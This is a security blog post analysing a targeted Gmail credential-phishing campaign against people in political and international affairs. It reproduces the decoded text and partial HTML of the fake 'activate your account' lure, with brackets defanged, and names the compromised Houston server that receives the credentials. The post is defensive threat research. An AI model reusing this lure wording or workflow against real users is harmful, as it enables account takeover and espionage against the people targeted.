I received a phishing email sample indicating that the attackers described in the above post continue their efforts with a very slight modifications to the original themes and I must note that this incident is even more simple than the previous one. I don't know if any accounts were compromised this time, I hope the public disclosure of the previous attacks along with the notifications on Forward rules and two-factor authentication in Gmail helped prevent most if not all compromises.

P.S. Google are aware of this, there is not much they can do to prevent these from coming in but I am sure they are trying. If you are concerned about your account safety, please use two-factor authentication and change your passwords often.

Distribution and targets: Email link, targeted phishing message sent to Gmail account of a person associated with political and international affairs (in this case). Links are customized and individualized for each target. The sender is a spoof address of a very close associate.

Attack approach:Victims get a message from an address of a close associate or a collaborating organization/agency, which is spoofed. The message is crafted to look like a subscription form offering to enter Gmail credentials to activate it. Considering that a lot of services use Google login for authentication, it is not supposed to alarm the recipient. As soon as credentials are entered, the following happens

= Credentials get posted / sent to a server in Houston, TX= Recipient gets redirected back to Gmail, already logged in so will end up back in the inbox= Attackers login to the compromised account within a few hours and then at least twice daily to check and read mail.

Note: no forwarding rules were set up by attackers for the duration of the testing.

Your account will be locked for unusual account activity, which includes, but is not limited to:1. Receiving, deleting, or downloading large amounts of mail via POP or IMAP in a short period of time.2. Sending a large number of undeliverable messages (messages that bounce back).3. Using file-sharing or file-storage software, browser extensions, or third party software that automatically logs in to your account.4. Leaving multiple instances of Gmail open.Browser-related issues. Please note that if you find your browser continually reloading while attempting to access your Inbox, it's probably a browser issue, and it may be necessary to clear your browser's cache and cookies. Please log in the Gmail Server to activate your account:

Headers and sender

The HTML code of the email is Base64 encoded and upon decoding presents the form above with the login information of the recipient already hardcoded in it

--------------------------------------

Credential harvest

Decoded form html code - the recipient address is changed to xxxxxxx@gmail.com and all < and > were replaced with { and }.

*Your account will be locked for unusual account activity, which includes,
but is not limited to:

1. Receiving, deleting, or downloading large amounts of mail via POP or
IMAP in a short period of time.
2. Sending a large number of undeliverable messages (messages that bounce
back).
3. Using file-sharing or file-storage software, browser extensions, or
third party software that automatically logs in to your account.
4. Leaving multiple instances of Gmail open.Browser-related issues.
Please note that if you find your browser continually reloading while
attempting to access your Inbox, it's probably a browser issue, and it may
be necessary to clear your browser's cache and cookies.

{ol}
{li}Receiving, deleting, or downloading large amounts of mail via POP or IM=
AP in a short period of time.{/li}
{li}Sending a large number of undeliverable messages (messages that bounce =
back).{/li}
{li}Using file-sharing or file-storage software, browser extensions, or thi=
rd party software that automatically logs in to your account.{/li}
{li}Leaving multiple instances of Gmail open.Browser-related issues. Please=
note that if you find your browser continually reloading while attempting =
to access your Inbox, it's probably a browser issue, and it may be nece=
ssary to clear your browser's cache and cookies. {/li}

Credential compromise testing

In order to test
the exploit, I made an account closely resembling the recipient account
and filled it with Google alerts about human rights and various military
issues, random malicious documents, and mail from China related Google
groups. The result is not very interesting for a spy but more or less
plausible.

I changed the hardcorded gmail ID of the target in the HTML code and entered the new account
credential information in the resulting "activate" form

The resulting traffic is as follows

www.softechglobal.com 70.86.21.146 appears to be a legitimate company with the website hosted in ThePlanet.com Internet Services and that server is compromised

70.86.21.146

92.15.5646.static.theplanet.com

Host reachable, 48 ms. average

70.84.0.0 - 70.87.255.255

ThePlanet.com Internet Services, Inc.

315 Capitol

Suite 205

Houston

TX

77002

United States

-----------------------------------------------------------www.softechglobal.com Hosting history

1 comment:

The other thing to look for is a forward set up on your account to another email. At least with human rights activists this was a common tactic so the attackers didn't need to log back into compromised accounts.

Malware samples are available for download by any responsible whitehat researcher. By downloading the samples, anyone waives all rights to claim punitive, incidental and consequential damages resulting from mishandling or self-infection.